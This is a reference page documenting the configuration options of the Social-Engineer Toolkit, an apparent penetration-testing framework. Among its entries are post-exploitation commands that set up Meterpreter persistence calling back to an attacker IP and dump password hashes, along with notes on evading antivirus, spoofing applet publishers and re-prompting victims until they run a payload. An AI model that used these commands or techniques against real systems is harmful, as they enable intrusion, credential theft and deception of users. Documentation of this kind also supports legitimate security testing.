You are here:

SET

Configuration

Location

The configuration file is available in /pentest/exploits/set/config. It is named set_config.

Parameters

METASPLOIT_PATH=/opt/metasploit/msf3

Defines the path to Metasploit.

METASPLOIT_DATABASE=postgresql

Tells what database to use when using the Metasploit framework. Default value is postgresql.

ENCOUNT=4

How many times SET should encode a payload if you're using standard Metasploit encoding options.

AUTO_MIGRATE=OFF

If this option is set, the Metasploit payloads will automatically migrate to notepad once the applet is executed.

It can be useful if the victim closes the browser. However, it can introduce buggy reusults.

CUSTOM_EXE=legit.binary

Custom EXE you want to use for Metasploit encoding. This usually has better Antivirus detection.

Currently set to legit.binary which is just calc.exe, as an example.

BACKDOOR_EXECUTION=ON

Used for the backdoored executable if you want to keep the executable to still work.

Normally, when legit.binary is used, it will render the application useless. Specifying this will keep the application working.

METERPRETER_MULTI_SCRIPT=OFF

LINUX_METERPRETER_MULTI_SCRIPT=OFF

Run multiple Meterpreter scripts once a session is active.

This may be important if we are sleeping and need to run persistence.

Tries to elevate permissions and other tasks in an automated fashion.

First turn this trigger on, then configure the flags.

Note that you need to separate the commands by a semi-column.

METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem

LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts

Commands you want to run once a Meterpreter session has been established.

Note that you need to separate commands with a semi-column. Example: run getsystem;run hashdump;run persistence

METASPLOIT_IFRAME_PORT=8080

Port used for the IFRAME injection using the Metasploit browser attacks.

By default, this port is 8080. If egress filtering is blocking it, you may replace with 21 or 53.

ETTERCAP=OFF

Use Ettercap when using website attack

ETTERCAP_PATH=/usr/share/ettercap

Ettercap home directory (needed for DNS_SPOOF)

ETTERCAP_DSNIFF_INTERFACE=eth0

Specify what interface you want Ettercap or Dsniff to listen to.

DSNIFF=OFF

Define to use Dsniff or not using website attack. If Dsniff is set to ON, Ettercap will automatically be disabled.

AUTO_DETECT=ON

Auto detection of IP address interface using Google. Set this to ON only if you want SET to auto detect your interface.

SENDMAIL=OFF

sendmail ON or OFF for spoofing email addresses

EMAIL_PROVIDER=GMAIL

Email provider list supports GMAIL, HOTMAIL and YAHOO.

WEBATTACK_EMAIL=OFF

Set to ON if you want to use email in conjunction with Web Attack.

MLITM_PORT=80

Man Left In The Middle port. This will be used for the web server bind port

APACHE_SERVER=OFF

Use Apache instead of standard python web servers. This will increase the speed of the attack vector.

APACHE_DIRECTORY=/var/www

Path to the Apache webroot.

WEB_PORT=80

Specify what port to run the HTTP server on. Used for the Java applet attack or Metasploit exploit.

Default port is 80

SELF_SIGNED_APPLET=OFF

Create self-signed Java applets and spoof publisher.

Note that you have to install Java 6 JDK (apt-get install openjdk-6-jdk or apt-get install sun-java6-jdk)

JAVA_ID_PARAM=Secure Java Applet

This flag will set the Java ID flag within the Java applet to something different.

This could be used to make it more believable or for better obfuscation.

JAVA_REPEATER=ON

Java applet repeater option will continue to prompt the user with the Java applet if the user hits "Cancel".

This means it will be continuous until run is executed, which gives a better success rate for the Java Applet Attack.

JAVA_TIME=200

Delay for the Java repeater (in hundredth of seconds) between the user hitting "Cancel" and next Java applet run.

200 means 2 seconds.

WEBATTACK_SSL=OFF

Turn ON SSL certificates to secure communications through Web Attack vector.

SELF_SIGNED_CERT=OFF

Set to ON to self-sign certificates with the Web Attack vector. Ensure OpenSSL is installed.

PEM_CLIENT=/root/newcert.pem

PEM_SERVER=/root/newreq.pem

Client/Server private cert in PEM format

WEBJACKING_TIME=2000

Tweak the Web Jacking time (expressed in milliseconds) used for the IFRAME replace.

5000 means 5 seconds

COMMAND_CENTER_INTERFACE=127.0.0.1

Command Center interface to bind to. To enable it on all interfaces, set it to 0.0.0.0.

COMMAND_CENTER_PORT=44444

Port for the Command Center

SET_INTERACTIVE_SHELL=ON

Include (ON) or Remove (OFF) the interactive shell from the menu selection.

TERMINAL=SOLO

Default terminal within the Command Center.

Default is XTERM. Can be XTERM, KONSOLE, GNOME or SOLO.

SOLO will place all results in the same shell you used to open the SET-Web interface.